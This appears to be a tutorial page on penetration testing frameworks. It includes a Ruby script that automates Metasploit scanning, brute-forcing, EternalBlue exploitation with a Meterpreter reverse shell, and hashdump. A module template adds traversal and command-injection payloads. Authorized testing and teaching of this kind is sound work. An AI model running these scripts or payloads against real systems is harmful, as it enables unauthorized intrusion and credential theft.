What are Penetration Testing Frameworks?
Penetration Testing Frameworks are comprehensive platforms that provide security professionals with tools, exploits, and methodologies to systematically test and validate security vulnerabilities in systems, networks, and applications. These frameworks combine automated vulnerability discovery with manual exploitation techniques to simulate real-world attacks and assess organizational security posture.
Leading frameworks include Metasploit for exploit development and automation, Core Impact for commercial enterprise testing, Canvas for advanced exploitation, and specialized tools like Burp Suite for web application testing. These platforms enable security teams to move beyond vulnerability scanning to actual exploitation and impact demonstration.
Leading Penetration Testing Frameworks
Metasploit Framework
Comprehensive exploitation framework with extensive exploit database.
• Automated exploitation workflows
• Post-exploitation modules
• Payload generation and encoding
• Integration with vulnerability scanners
Core Impact
Commercial penetration testing platform with enterprise features.
• Advanced pivoting capabilities
• Comprehensive reporting
• Client-side attack simulation
• Commercial support and training
Canvas
Advanced exploitation framework with focus on complex attack scenarios.
• Advanced evasion techniques
• Custom exploit development
• Multi-stage attack campaigns
• Professional services support
Burp Suite Professional
Specialized web application security testing platform.
• Automated web app scanning
• Manual testing tools
• Extension ecosystem
• Vulnerability validation
Metasploit Framework Implementation
Automated Metasploit Scanning and Exploitation
Ruby script for an automated vulnerability scanning and exploitation workflow, driven through the Metasploit RPC service.
#!/usr/bin/env ruby
# Automated Metasploit Penetration Testing Workflow
require 'msfrpc-client' # provided by the msfrpc-client gem
require 'json'
require 'logger'
class MetasploitAutomation
def initialize(host = '127.0.0.1', port = 55552)
@logger = Logger.new(STDOUT)
@logger.level = Logger::INFO
# Connect to Metasploit RPC
@client = Msf::RPC::Client.new(
host: host,
port: port,
uri: '/api/',
ssl: false
)
@scan_start_time = Time.now # Reported as start_time by generate_report
@console_id = nil
@target_hosts = []
@discovered_vulns = []
@exploitation_results = []
end
# Authenticate with the Metasploit RPC service
def authenticate(username = 'msf', password = 'password')
begin
result = @client.call('auth.login', username, password)
if result['result'] == 'success'
@logger.info("Successfully authenticated to Metasploit RPC")
@token = result['token']
@client.token = @token
return true
else
@logger.error("Authentication failed: #{result}")
return false
end
rescue StandardError => e
@logger.error("RPC connection failed: #{e.message}")
return false
end
end
# Create a new Metasploit console for command execution
def create_console
result = @client.call('console.create')
@console_id = result['id']
@logger.info("Created console with ID: #{@console_id}")
# Wait for console to be ready
sleep(2)
return @console_id
end
# Run an Nmap scan through Metasploit to discover hosts and services
def run_nmap_scan(target_range)
@logger.info("Starting Nmap scan of #{target_range}")
# Use Metasploit's db_nmap command for integrated scanning.
# -A already enables version (-sV) and OS (-O) detection, so they are not repeated.
nmap_command = "db_nmap -sS -A #{target_range}"
result = @client.call('console.write', @console_id, nmap_command + "\n")
# Wait for scan completion
scan_complete = false
timeout = 300 # 5 minutes timeout
start_time = Time.now
while !scan_complete && (Time.now - start_time) < timeout
sleep(5)
# Read console output
output = @client.call('console.read', @console_id)
if output['data']
@logger.info("Scan progress: #{output['data'].lines.last&.strip}")
# Check for scan completion indicators
if output['data'].include?('Nmap done') || output['data'].include?('scan complete')
scan_complete = true
end
end
end
@logger.info("Nmap scan completed")
return get_discovered_hosts
end
# Retrieve hosts discovered during scanning
def get_discovered_hosts
hosts_result = @client.call('db.hosts')
@target_hosts = []
hosts_result.each do |host_data|
host_info = {
address: host_data['address'],
os_name: host_data['os_name'] || 'Unknown',
os_sp: host_data['os_sp'] || '',
purpose: host_data['purpose'] || 'device',
services: get_host_services(host_data['address'])
}
@target_hosts << host_info
end
@logger.info("Discovered #{@target_hosts.length} hosts")
return @target_hosts
end
# Get services for a specific host
def get_host_services(host_address)
services_result = @client.call('db.services', { host: host_address })
services = []
services_result.each do |service|
services << {
port: service['port'],
proto: service['proto'],
name: service['name'],
info: service['info'] || '',
state: service['state']
}
end
return services
end
# Run vulnerability scanning using auxiliary modules
def run_vulnerability_scan
@logger.info("Starting vulnerability scanning")
# Common vulnerability scanner modules
vuln_scanners = [
'auxiliary/scanner/smb/smb_ms17_010', # EternalBlue
'auxiliary/scanner/ssh/ssh_login', # SSH brute force
'auxiliary/scanner/ftp/ftp_login', # FTP brute force
'auxiliary/scanner/http/dir_scanner', # Directory enumeration
'auxiliary/scanner/ssl/ssl_version', # SSL version detection
'auxiliary/scanner/mysql/mysql_login' # MySQL brute force
]
@target_hosts.each do |host|
@logger.info("Scanning host #{host[:address]}")
host[:services].each do |service|
# Select appropriate scanner based on service
scanner = select_scanner_for_service(service, vuln_scanners)
if scanner
run_auxiliary_module(scanner, host[:address], service[:port])
end
end
end
@logger.info("Vulnerability scanning completed")
end
# Select the appropriate scanner module for a detected service
def select_scanner_for_service(service, scanners)
service_name = service[:name].to_s.downcase # name can be nil for unidentified services
port = service[:port]
case service_name
when /smb|microsoft-ds/
return 'auxiliary/scanner/smb/smb_ms17_010' if port == 445
when /ssh/
return 'auxiliary/scanner/ssh/ssh_login'
when /ftp/
return 'auxiliary/scanner/ftp/ftp_login'
when /http/ # also matches "https"
return 'auxiliary/scanner/http/dir_scanner'
when /mysql/
return 'auxiliary/scanner/mysql/mysql_login'
when /ssl/ # "https" never reaches this branch; it is caught by /http/ above
return 'auxiliary/scanner/ssl/ssl_version'
end
return nil
end
# Execute an auxiliary scanning module
def run_auxiliary_module(module_name, target_host, target_port)
@logger.info("Running #{module_name} against #{target_host}:#{target_port}")
# Configure and run module
commands = [
"use #{module_name}",
"set RHOSTS #{target_host}",
"set RPORT #{target_port}",
"set THREADS 5",
"run"
]
commands.each do |command|
@client.call('console.write', @console_id, command + "\n")
sleep(1)
end
# Wait for module completion and collect results
sleep(10) # Allow time for execution
output = @client.call('console.read', @console_id)
if output['data']
parse_auxiliary_results(module_name, target_host, target_port, output['data'])
end
end
# Parse results from auxiliary module execution
def parse_auxiliary_results(module_name, host, port, output)
# Look for vulnerability indicators in output
if output.include?('[+]') || output.include?('VULNERABLE')
vulnerability = {
host: host,
port: port,
module: module_name,
status: 'vulnerable',
details: output.lines.select { |line| line.include?('[+]') }.join("\n"),
timestamp: Time.now
}
@discovered_vulns << vulnerability
@logger.info("Vulnerability found: #{module_name} on #{host}:#{port}")
end
end
# Attempt to exploit discovered vulnerabilities
def attempt_exploitation
@logger.info("Starting exploitation phase")
@discovered_vulns.each do |vuln|
exploit_module = map_scanner_to_exploit(vuln[:module])
if exploit_module
@logger.info("Attempting exploitation of #{vuln[:host]} with #{exploit_module}")
result = run_exploit_module(exploit_module, vuln)
@exploitation_results << result
end
end
@logger.info("Exploitation phase completed")
end
# Map a vulnerability scanner module to the corresponding exploit module
def map_scanner_to_exploit(scanner_module)
exploit_map = {
'auxiliary/scanner/smb/smb_ms17_010' => 'exploit/windows/smb/ms17_010_eternalblue',
'auxiliary/scanner/ssh/ssh_login' => 'exploit/multi/ssh/sshexec',
# Add more mappings as needed
}
return exploit_map[scanner_module]
end
# Execute an exploit module against a vulnerable target
def run_exploit_module(exploit_module, vulnerability)
target_host = vulnerability[:host]
target_port = vulnerability[:port]
commands = [
"use #{exploit_module}",
"set RHOSTS #{target_host}",
"set RPORT #{target_port}",
"set payload windows/x64/meterpreter/reverse_tcp", # Assumes a 64-bit Windows target; pick a payload that matches the module
"set LHOST 192.168.1.100", # Placeholder: replace with the tester's listener address
"set LPORT 4444",
"exploit"
]
commands.each do |command|
@client.call('console.write', @console_id, command + "\n")
sleep(1)
end
# Wait for exploitation attempt
sleep(15)
output = @client.call('console.read', @console_id)
exploitation_result = {
host: target_host,
port: target_port,
exploit: exploit_module,
success: output['data'].to_s.include?('Meterpreter session'), # to_s guards against a nil read
session_id: extract_session_id(output['data']),
timestamp: Time.now,
output: output['data']
}
if exploitation_result[:success]
@logger.info("Successfully exploited #{target_host}")
perform_post_exploitation(exploitation_result[:session_id])
else
@logger.warn("Exploitation failed for #{target_host}")
end
return exploitation_result
end
# Extract the Meterpreter session ID from console output
def extract_session_id(output)
match = output.to_s.match(/Meterpreter session (\d+) opened/)
return match[1].to_i if match
return nil
end
# Perform post-exploitation activities
def perform_post_exploitation(session_id)
return unless session_id
@logger.info("Performing post-exploitation on session #{session_id}")
post_exploit_commands = [
"sessions -i #{session_id}",
"getuid",
"sysinfo",
"getprivs",
"run post/windows/gather/enum_logged_on_users",
"run post/windows/gather/hashdump",
"background"
]
post_exploit_commands.each do |command|
@client.call('console.write', @console_id, command + "\n")
sleep(2)
end
# Collect post-exploitation results
sleep(10)
output = @client.call('console.read', @console_id)
@logger.info("Post-exploitation completed for session #{session_id}")
return output['data']
end
# Generate a comprehensive penetration testing report
def generate_report
report = {
scan_summary: {
start_time: @scan_start_time,
end_time: Time.now,
hosts_discovered: @target_hosts.length,
vulnerabilities_found: @discovered_vulns.length,
successful_exploits: @exploitation_results.count { |r| r[:success] }
},
discovered_hosts: @target_hosts,
vulnerabilities: @discovered_vulns,
exploitation_results: @exploitation_results,
recommendations: generate_recommendations
}
# Write report to file
File.open("pentest_report_#{Time.now.strftime('%Y%m%d_%H%M%S')}.json", 'w') do |file|
file.write(JSON.pretty_generate(report))
end
@logger.info("Report generated successfully")
return report
end
# Generate security recommendations based on findings
def generate_recommendations
recommendations = []
# Group vulnerabilities by type
vuln_types = @discovered_vulns.group_by { |v| v[:module] }
vuln_types.each do |module_name, vulns|
case module_name
when /smb_ms17_010/
recommendations << {
title: "Critical: EternalBlue Vulnerability",
priority: "Critical",
description: "#{vulns.length} systems vulnerable to MS17-010 (EternalBlue)",
remediation: "Apply Microsoft security update MS17-010 immediately"
}
when /ssh_login/
recommendations << {
title: "SSH Weak Authentication",
priority: "High",
description: "#{vulns.length} systems with weak SSH credentials",
remediation: "Implement strong password policies and consider key-based authentication"
}
end
end
return recommendations
end
# Clean up resources and close connections
def cleanup
if @console_id
@client.call('console.destroy', @console_id)
@logger.info("Console #{@console_id} destroyed")
end
@logger.info("Cleanup completed")
end
end
# Example usage
if __FILE__ == $0
pentest = MetasploitAutomation.new
if pentest.authenticate
pentest.create_console
pentest.run_nmap_scan("192.168.1.0/24")
pentest.run_vulnerability_scan
pentest.attempt_exploitation
report = pentest.generate_report
pentest.cleanup
puts "Penetration testing completed. Report saved."
else
puts "Failed to authenticate with Metasploit RPC"
end
end
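The script above waits with fixed `sleep` calls and looks for strings such as "Nmap done", which can cut output short or stall on slow targets. As a minimal sketch, the helper below polls `console.read` until the console reports that it is idle or a deadline passes. The name `read_until_idle` is hypothetical, and the sketch assumes the `console.read` response carries a boolean `busy` field alongside `data`; check this against the RPC service in use.

```ruby
# Hypothetical helper: poll an RPC console until it is idle or a deadline passes.
# `client` is any object that responds to call(method, *args), such as the
# @client used in the script above.
def read_until_idle(client, console_id, timeout: 300, interval: 5)
  deadline = Process.clock_gettime(Process::CLOCK_MONOTONIC) + timeout
  buffer = +''

  loop do
    chunk = client.call('console.read', console_id)
    buffer << chunk['data'].to_s

    # Assumption: the response includes a boolean 'busy' flag.
    return { output: buffer, timed_out: false } unless chunk['busy']

    if Process.clock_gettime(Process::CLOCK_MONOTONIC) >= deadline
      return { output: buffer, timed_out: true }
    end

    sleep(interval)
  end
end
```

Returning the accumulated output together with a `timed_out` flag lets the caller decide whether to parse partial results or abort, instead of logging "completed" unconditionally.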
Custom Metasploit Module Development
Ruby template for developing custom Metasploit auxiliary and exploit modules.
##
# Custom Vulnerability Scanner Module for Metasploit
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Custom Application Vulnerability Scanner',
'Description' => %q{
This module scans for a custom application vulnerability
specific to the target organization's environment.
},
'Author' => ['Your Name'],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2024-XXXX'],
['URL', 'https://example.com/vulnerability-details']
],
'DisclosureDate' => '2024-01-15'
))
register_options([
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'The target URI path', '/api/v1/']),
OptString.new('USERNAME', [false, 'Username for authentication', '']),
OptString.new('PASSWORD', [false, 'Password for authentication', '']),
OptInt.new('TIMEOUT', [true, 'Request timeout in seconds', 10])
])
end
# Check whether the target is vulnerable without exploiting it
def check
begin
connect
# Send probe request
probe_request = "GET #{datastore['TARGETURI']}health HTTP/1.1\r\n"
probe_request << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
probe_request << "User-Agent: #{Rex::UserAgent.session_agent}\r\n"
probe_request << "Connection: close\r\n\r\n"
sock.put(probe_request)
response = sock.get_once(-1, datastore['TIMEOUT'])
disconnect
if response && response.include?('Custom-App-Version: 1.2.3')
return Exploit::CheckCode::Appears
elsif response && response.include?('Custom-App')
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionError, ::Rex::ConnectionRefused, ::Timeout::Error
return Exploit::CheckCode::Unknown
end
end
# Main scanner logic for each target host
def run_host(target_host)
print_status("#{target_host}:#{datastore['RPORT']} - Starting vulnerability scan")
# Check if target is potentially vulnerable
check_result = check
case check_result
when Exploit::CheckCode::Appears
print_good("#{target_host}:#{datastore['RPORT']} - Target appears vulnerable")
perform_vulnerability_test(target_host)
when Exploit::CheckCode::Detected
print_status("#{target_host}:#{datastore['RPORT']} - Custom application detected, testing...")
perform_vulnerability_test(target_host)
when Exploit::CheckCode::Safe
print_status("#{target_host}:#{datastore['RPORT']} - Target does not appear vulnerable")
else
print_status("#{target_host}:#{datastore['RPORT']} - Unable to determine vulnerability status")
end
end
# Perform detailed vulnerability testing
def perform_vulnerability_test(target_host)
begin
# Every probe sends "Connection: close", so each test gets its own socket
connect
# Test for authentication bypass
auth_bypass_result = test_auth_bypass
disconnect
connect
# Test for directory traversal
directory_traversal_result = test_directory_traversal
disconnect
connect
# Test for command injection
command_injection_result = test_command_injection
disconnect
# Report findings
report_vulnerabilities(target_host, {
auth_bypass: auth_bypass_result,
directory_traversal: directory_traversal_result,
command_injection: command_injection_result
})
rescue ::Rex::ConnectionError, ::Rex::ConnectionRefused, ::Timeout::Error => e
print_error("#{target_host}:#{datastore['RPORT']} - Connection failed: #{e.message}")
end
end
# Test for an authentication bypass vulnerability
def test_auth_bypass
# Test malformed authentication header
auth_test_request = "GET #{datastore['TARGETURI']}admin HTTP/1.1\r\n"
auth_test_request << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
auth_test_request << "Authorization: Bearer ../../../bypass\r\n"
auth_test_request << "Connection: close\r\n\r\n"
sock.put(auth_test_request)
response = sock.get_once(-1, datastore['TIMEOUT'])
if response && response.include?('admin dashboard') && !response.include?('401')
return {
vulnerable: true,
description: 'Authentication bypass via malformed Bearer token',
risk_level: 'High'
}
end
return { vulnerable: false }
end
# Test for a directory traversal vulnerability
def test_directory_traversal
# Test path traversal in file parameter
traversal_payloads = [
'../../../etc/passwd',
'....//....//....//etc/passwd',
'%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd'
]
traversal_payloads.each do |payload|
traversal_request = "GET #{datastore['TARGETURI']}file?path=#{payload} HTTP/1.1\r\n"
traversal_request << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
traversal_request << "Connection: close\r\n\r\n"
sock.put(traversal_request)
response = sock.get_once(-1, datastore['TIMEOUT'])
if response && response.include?('root:x:0:0:')
return {
vulnerable: true,
description: "Directory traversal via file parameter using payload: #{payload}",
risk_level: 'High'
}
end
end
return { vulnerable: false }
end
# Test for a command injection vulnerability
def test_command_injection
# Test command injection in system parameter
injection_payload = "; id #"
# Build the JSON body first so Content-Length reflects its exact byte size
body = "{\"command\":\"ping #{injection_payload}\"}"
injection_request = "POST #{datastore['TARGETURI']}system HTTP/1.1\r\n"
injection_request << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
injection_request << "Content-Type: application/json\r\n"
injection_request << "Content-Length: #{body.bytesize}\r\n"
injection_request << "Connection: close\r\n\r\n"
injection_request << body
sock.put(injection_request)
response = sock.get_once(-1, datastore['TIMEOUT'])
if response && response.match(/uid=\d+.*gid=\d+/)
return {
vulnerable: true,
description: 'Command injection in system command parameter',
risk_level: 'Critical'
}
end
return { vulnerable: false }
end
# Report discovered vulnerabilities to the Metasploit database
def report_vulnerabilities(target_host, results)
results.each do |vuln_type, result|
next unless result[:vulnerable]
print_good("#{target_host}:#{datastore['RPORT']} - #{result[:description]}")
# Report to Metasploit database
report_vuln(
host: target_host,
port: datastore['RPORT'],
proto: 'tcp',
name: "custom-app-#{vuln_type}",
info: result[:description],
refs: self.references
)
# Report service if not already detected
report_service(
host: target_host,
port: datastore['RPORT'],
proto: 'tcp',
name: 'http',
info: 'Custom vulnerable application'
)
end
end
end
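The template decides on a finding with substring checks such as `response.include?('401')`, which also match when the digits appear in the body or a header value. As a minimal sketch, the helper below splits a raw HTTP response into status code, headers, and body so that checks can compare the actual status. The name `parse_raw_http_response` is hypothetical and is not part of Metasploit; inside a real module, the framework's `Msf::Exploit::Remote::HttpClient` mixin is likely the better fit than hand-built requests.

```ruby
# Hypothetical helper: split a raw HTTP response into its parts.
# Returns nil when the input does not start with a valid status line.
def parse_raw_http_response(raw)
  return nil if raw.nil? || raw.empty?

  head, body = raw.split("\r\n\r\n", 2)
  lines = head.to_s.split("\r\n")
  status_line = lines.shift.to_s
  match = status_line.match(%r{\AHTTP/\d(?:\.\d)?\s+(\d{3})})
  return nil unless match

  # Header names are lowercased because HTTP header names are case-insensitive.
  headers = lines.each_with_object({}) do |line, acc|
    name, value = line.split(':', 2)
    acc[name.strip.downcase] = value.strip if name && value
  end

  { status: match[1].to_i, headers: headers, body: body.to_s }
end
```

With this in place, a check like the authentication bypass test could require `parsed[:status] == 200` and then inspect `parsed[:body]`, rather than searching the whole response for `401`.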
Real-World Penetration Testing Implementations
Fortune 500 Financial Services
Comprehensive penetration testing across global infrastructure.
• Quarterly testing with Core Impact and Metasploit Pro
• 500+ servers across multiple data centers
• Automated reporting and remediation tracking
• Integration with vulnerability management program
Government Defense Contractor
High-security penetration testing with custom exploit development.
• Canvas platform with custom zero-day exploits
• Air-gapped environment testing capabilities
• Multi-classification level assessment
• Advanced persistent threat simulation
Healthcare Network
HIPAA-compliant testing focusing on patient data protection.
• Burp Suite Professional for web application testing
• Medical device network segmentation validation
• Non-disruptive testing methodologies
• Compliance-focused reporting and metrics
E-commerce Platform
Continuous penetration testing integrated with DevOps pipeline.
• Hybrid approach using multiple open-source tools
• Automated testing in CI/CD pipeline
• PCI-DSS compliance validation
• Real-time security feedback to developers
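One way to wire test results into a CI/CD pipeline is a gate step that reads a JSON report and fails the build when findings reach a chosen severity. The sketch below assumes a report shaped like the one written by `generate_report` earlier, with a `recommendations` array whose entries carry `title` and `priority`. The ranking table and the `blocking_findings` name are hypothetical and should follow the team's own policy.

```ruby
require 'json'

# Hypothetical severity ordering; adjust to the team's own policy.
PRIORITY_RANK = { 'Low' => 1, 'Medium' => 2, 'High' => 3, 'Critical' => 4 }.freeze

# Return the recommendations at or above the given priority threshold.
# Entries with an unknown or missing priority rank as 0 and never block.
def blocking_findings(report, threshold: 'High')
  limit = PRIORITY_RANK.fetch(threshold)
  Array(report['recommendations']).select do |rec|
    PRIORITY_RANK.fetch(rec['priority'], 0) >= limit
  end
end
```

A pipeline step could load the report with `JSON.parse(File.read(path))`, print each blocking entry, and exit non-zero when the returned list is not empty.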
Advanced Exploitation Techniques
Network Exploitation
• Buffer Overflows: Memory corruption vulnerabilities
• Network Service Exploits: SMB, SSH, RDP vulnerabilities
• Man-in-the-Middle: Network traffic interception
• Pivoting: Using compromised hosts as attack platforms
• Lateral Movement: Spreading through internal networks
• Privilege Escalation: Gaining administrative access
Application Exploitation
• SQL Injection: Database query manipulation
• Cross-Site Scripting (XSS): Client-side code injection
• Command Injection: Operating system command execution
• File Upload Vulnerabilities: Malicious file execution
• Authentication Bypass: Access control circumvention
• Business Logic Flaws: Application workflow exploitation
Penetration Testing Framework Best Practices
✅ Do
• Obtain proper written authorization before testing
• Combine automated tools with manual testing techniques
• Validate all findings before reporting to eliminate false positives
• Document exploitation steps with proof-of-concept evidence
• Provide clear remediation guidance for discovered vulnerabilities
• Follow responsible disclosure practices for findings
❌ Don't
• Perform testing without proper authorization and scope definition
• Rely solely on automated scanning without manual validation
• Cause unnecessary disruption to production systems
• Access or modify sensitive data beyond proof-of-concept
• Share exploitation techniques or tools with unauthorized parties
• Ignore proper cleanup and artifact removal after testing
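The authorization and scope points above can be enforced in tooling as well as on paper. As a minimal sketch, the class below checks a single address against the CIDR ranges named in a signed authorization before any scan or module is run against it. `EngagementScope` and its method names are hypothetical, and the ranges in the usage note are placeholders.

```ruby
require 'ipaddr'

# Hypothetical scope definition built from the ranges in the written authorization.
class EngagementScope
  def initialize(allowed_cidrs, excluded_cidrs = [])
    @allowed = allowed_cidrs.map { |cidr| IPAddr.new(cidr) }
    @excluded = excluded_cidrs.map { |cidr| IPAddr.new(cidr) }
  end

  # True only when the address lies inside an allowed range and outside
  # every excluded range. Unparseable input is treated as out of scope.
  def in_scope?(address)
    ip = IPAddr.new(address)
    @allowed.any? { |range| range.include?(ip) } &&
      @excluded.none? { |range| range.include?(ip) }
  rescue IPAddr::Error
    false
  end
end
```

For example, `EngagementScope.new(['192.168.1.0/24'], ['192.168.1.10'])` would accept `192.168.1.5` and reject both `192.168.1.10` and `10.0.0.1`. Rejecting unparseable input also keeps malformed strings from being interpolated into scanner commands.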